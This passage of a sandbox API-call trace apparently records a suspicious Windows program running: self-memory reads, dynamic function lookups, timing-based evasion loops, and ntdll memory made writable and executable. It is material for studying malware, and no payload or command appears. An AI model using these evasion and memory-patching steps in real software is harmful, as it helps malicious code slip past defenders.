lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bd, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001be, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bf, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ca, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cb, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cc, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cd, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ce, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cf, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.301] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.301] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001da, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001db, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001dc, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001dd, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001de, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001df, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.302] GetLastError () returned 0x0 [0319.302] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ea, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.303] GetLastError () returned 0x0 [0319.303] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001eb, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.303] GetLastError () returned 0x0 [0319.303] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ec, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.303] GetLastError () returned 0x0 [0319.303] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ed, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.303] GetLastError () returned 0x0 [0319.303] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ee, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.303] GetLastError () returned 0x0 [0319.303] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ef, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.303] GetLastError () returned 0x0 [0319.303] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.303] GetLastError () returned 0x0 [0319.303] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.303] GetLastError () returned 0x0 [0319.303] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.303] GetLastError () returned 0x0 [0319.303] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.303] GetLastError () returned 0x0 [0319.303] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.303] GetLastError () returned 0x0 [0319.303] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.303] GetLastError () returned 0x0 [0319.303] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.303] GetLastError () returned 0x0 [0319.303] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.303] GetLastError () returned 0x0 [0319.303] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.303] GetLastError () returned 0x0 [0319.303] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001f9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.303] GetLastError () returned 0x0 [0319.303] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001fa, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0319.312] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0319.312] SetErrorMode (uMode=0x8001) returned 0x8001 [0319.312] GetProcAddress (hModule=0x759c0000, lpProcName="EnumResourceTypesA") returned 0x75a50efd [0319.312] EnumResourceTypesA (hModule=0x0, lpEnumFunc=0x408bc5, lParam=0x0) [0319.312] SetErrorMode (uMode=0x8001) returned 0x8001 [0319.312] LoadLibraryA (lpLibFileName="shell32") returned 0x76a70000 [0319.314] SetErrorMode (uMode=0x8001) returned 0x8001 [0319.314] GetProcAddress (hModule=0x76a70000, lpProcName="Shell_NotifyIconA") returned 0x76cb8af2 [0319.314] Shell_NotifyIconA (dwMessage=0x0, lpData=0x18f370) returned 1 [0319.315] Shell_NotifyIconA (dwMessage=0x2, lpData=0x18f370) returned 1 [0319.319] LoadLibraryA (lpLibFileName="NTDLL") returned 0x77cb0000 [0319.319] SetErrorMode (uMode=0x8001) returned 0x8001 [0319.319] GetProcAddress (hModule=0x77cb0000, lpProcName="ZwSetInformationProcess") returned 0x77ccfb18 [0319.319] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x22, ProcessInformation=0x400004, ProcessInformationLength=0x4) returned 0x0 [0319.319] SetErrorMode (uMode=0x8001) returned 0x8001 [0319.319] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0319.319] SetErrorMode (uMode=0x8001) returned 0x8001 [0319.319] GetProcAddress (hModule=0x759c0000, lpProcName="Sleep") returned 0x759d10ff [0319.319] SetErrorMode (uMode=0x8001) returned 0x8001 [0319.319] LoadLibraryA (lpLibFileName="user32") returned 0x758c0000 [0319.319] SetErrorMode (uMode=0x8001) returned 0x8001 [0319.319] GetProcAddress (hModule=0x758c0000, lpProcName="GetDesktopWindow") returned 0x758e0a19 [0319.319] GetDesktopWindow () returned 0x10010 [0319.319] SetErrorMode (uMode=0x8001) returned 0x8001 [0319.319] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0319.319] SetErrorMode (uMode=0x8001) returned 0x8001 [0319.320] GetProcAddress (hModule=0x759c0000, lpProcName="HeapAlloc") returned 0x77cde026 [0319.320] SetErrorMode (uMode=0x8001) returned 0x8001 [0319.320] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0319.320] SetErrorMode (uMode=0x8001) returned 0x8001 [0319.320] GetProcAddress (hModule=0x759c0000, lpProcName="SetLastError") returned 0x759d11a9 [0319.320] SetLastError (dwErrCode=0x5) [0319.320] SetErrorMode (uMode=0x8001) returned 0x8001 [0319.320] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0319.320] SetErrorMode (uMode=0x8001) returned 0x8001 [0319.320] GetProcAddress (hModule=0x759c0000, lpProcName="SetErrorMode") returned 0x759d1b00 [0319.320] SetErrorMode (uMode=0x400) returned 0x8001 [0319.320] SetErrorMode (uMode=0x0) returned 0x400 [0319.320] SetErrorMode (uMode=0x8001) returned 0x0 [0319.320] LoadLibraryA (lpLibFileName="ntdll") returned 0x77cb0000 [0319.320] SetErrorMode (uMode=0x0) returned 0x8001 [0319.320] GetProcAddress (hModule=0x77cb0000, lpProcName="NtYieldExecution") returned 0x77ccff2c [0319.320] Sleep (dwMilliseconds=0xf) [0319.323] NtYieldExecution () returned 0x0 [0319.331] Sleep (dwMilliseconds=0xf) [0319.339] NtYieldExecution () returned 0x0 [0319.339] Sleep (dwMilliseconds=0xf) [0319.355] NtYieldExecution () returned 0x40000024 [0319.355] Sleep (dwMilliseconds=0xf) [0319.371] NtYieldExecution () returned 0x40000024 [0319.371] Sleep (dwMilliseconds=0xf) [0319.386] NtYieldExecution () returned 0x40000024 [0319.386] Sleep (dwMilliseconds=0xf) [0319.402] NtYieldExecution () returned 0x0 [0319.402] Sleep (dwMilliseconds=0xf) [0319.419] NtYieldExecution () returned 0x40000024 [0319.419] Sleep (dwMilliseconds=0xf) [0319.433] NtYieldExecution () returned 0x40000024 [0319.433] Sleep (dwMilliseconds=0xf) [0319.449] NtYieldExecution () returned 0x40000024 [0319.449] Sleep (dwMilliseconds=0xf) [0319.464] NtYieldExecution () returned 0x40000024 [0319.464] Sleep (dwMilliseconds=0xf) [0319.480] NtYieldExecution () returned 0x40000024 [0319.480] Sleep (dwMilliseconds=0xf) [0319.501] NtYieldExecution () returned 0x0 [0319.528] Sleep (dwMilliseconds=0xf) [0319.549] NtYieldExecution () returned 0x0 [0319.550] Sleep (dwMilliseconds=0xf) [0319.558] NtYieldExecution () returned 0x40000024 [0319.558] Sleep (dwMilliseconds=0xf) [0319.573] NtYieldExecution () returned 0x40000024 [0319.573] Sleep (dwMilliseconds=0xf) [0319.589] NtYieldExecution () returned 0x40000024 [0319.589] Sleep (dwMilliseconds=0xf) [0319.604] NtYieldExecution () returned 0x40000024 [0319.604] Sleep (dwMilliseconds=0xf) [0319.623] NtYieldExecution () returned 0x40000024 [0319.623] Sleep (dwMilliseconds=0xf) [0319.646] NtYieldExecution () returned 0x0 [0319.646] Sleep (dwMilliseconds=0xf) [0319.653] NtYieldExecution () returned 0x0 [0319.654] Sleep (dwMilliseconds=0xf) [0319.668] NtYieldExecution () returned 0x0 [0319.669] Sleep (dwMilliseconds=0xf) [0319.684] NtYieldExecution () returned 0x40000024 [0319.684] Sleep (dwMilliseconds=0xf) [0319.703] NtYieldExecution () returned 0x0 [0319.704] Sleep (dwMilliseconds=0xf) [0319.715] NtYieldExecution () returned 0x0 [0319.715] Sleep (dwMilliseconds=0xf) [0319.729] NtYieldExecution () returned 0x40000024 [0319.729] Sleep (dwMilliseconds=0xf) [0319.745] NtYieldExecution () returned 0x40000024 [0319.745] Sleep (dwMilliseconds=0xf) [0319.796] NtYieldExecution () returned 0x0 [0319.797] Sleep (dwMilliseconds=0xf) [0319.807] NtYieldExecution () returned 0x40000024 [0319.807] Sleep (dwMilliseconds=0xf) [0319.824] NtYieldExecution () returned 0x0 [0319.825] Sleep (dwMilliseconds=0xf) [0319.838] NtYieldExecution () returned 0x0 [0319.839] Sleep (dwMilliseconds=0xf) [0319.854] NtYieldExecution () returned 0x40000024 [0319.854] Sleep (dwMilliseconds=0xf) [0319.870] NtYieldExecution () returned 0x40000024 [0319.870] Sleep (dwMilliseconds=0x1f40) [0327.938] SetErrorMode (uMode=0x8001) returned 0x0 [0327.938] LoadLibraryA (lpLibFileName="ntdll") returned 0x77cb0000 [0327.938] SetErrorMode (uMode=0x0) returned 0x8001 [0327.938] GetProcAddress (hModule=0x77cb0000, lpProcName="NtProtectVirtualMemory") returned 0x77cd0028 [0327.939] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18f53c*=0x77cc0000, NumberOfBytesToProtect=0x18f540, NewAccessProtection=0x40, OldAccessProtection=0x18f544 | out: BaseAddress=0x18f53c*=0x77cc0000, NumberOfBytesToProtect=0x18f540, OldAccessProtection=0x18f544*=0x20) returned 0x0 [0327.970] SetErrorMode (uMode=0x8001) returned 0x0 [0327.970] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0327.970] SetErrorMode (uMode=0x0) returned 0x8001 [0327.971] GetProcAddress (hModule=0x759c0000, lpProcName="CreateFileA") returned 0x759d53c6 [0327.971] SetErrorMode (uMode=0x8001) returned 0x0 [0327.971] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0327.971] SetErrorMode (uMode=0x0) returned 0x8001 [0327.971] GetProcAddress (hModule=0x759c0000, lpProcName="WriteFile") returned 0x759d1282 [0327.971] SetErrorMode (uMode=0x8001) returned 0x0 [0327.971] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0327.972] SetErrorMode (uMode=0x0) returned 0x8001 [0327.972] GetProcAddress (hModule=0x759c0000, lpProcName="CloseHandle") returned 0x759d1410 [0327.972] SetErrorMode (uMode=0x8001) returned 0x0 [0327.972] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0327.972] SetErrorMode (uMode=0x0) returned 0x8001 [0327.972] GetProcAddress (hModule=0x759c0000, lpProcName="ReadFile") returned 0x759d3ed3 [0327.972] SetErrorMode (uMode=0x8001) returned 0x0 [0327.973] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0327.973] SetErrorMode (uMode=0x0) returned 0x8001 [0327.973] GetProcAddress (hModule=0x759c0000, lpProcName="GetFileSize") returned 0x759d196e [0327.973] SetErrorMode (uMode=0x8001) returned 0x0 [0327.973] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0327.973] SetErrorMode (uMode=0x0) returned 0x8001 [0327.973] GetProcAddress (hModule=0x759c0000, lpProcName="UnmapViewOfFile") returned 0x759d1826 [0327.973] SetErrorMode (uMode=0x8001) returned 0x0 [0327.974] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0327.974] SetErrorMode (uMode=0x0) returned 0x8001 [0327.974] GetProcAddress (hModule=0x759c0000, lpProcName="VirtualProtectEx") returned 0x75a545bf [0327.974] SetErrorMode (uMode=0x8001) returned 0x0 [0327.974] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0327.974] SetErrorMode (uMode=0x0) returned 0x8001 [0327.974] GetProcAddress (hModule=0x759c0000, lpProcName="GetLongPathNameA") returned 0x75a5437f [0327.974] SetErrorMode (uMode=0x8001) returned 0x0 [0327.974] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0327.975] SetErrorMode (uMode=0x0) returned 0x8001 [0327.975] GetProcAddress (hModule=0x759c0000, lpProcName="TerminateProcess") returned 0x759ed802 [0327.975] SetErrorMode (uMode=0x8001) returned 0x0 [0327.975] LoadLibraryA (lpLibFileName="IPHlpApi") returned 0x756b0000 [0327.979] SetErrorMode (uMode=0x0) returned 0x8001 [0327.979] GetProcAddress (hModule=0x756b0000, lpProcName="GetAdaptersInfo") returned 0x756b9263 [0327.979] SetErrorMode (uMode=0x8001) returned 0x0 [0327.979] LoadLibraryA (lpLibFileName="kernel32") returned 0x759c0000 [0327.979] SetErrorMode (uMode=0x0) returned 0x8001 [0327.979] GetProcAddress (hModule=0x759c0000, 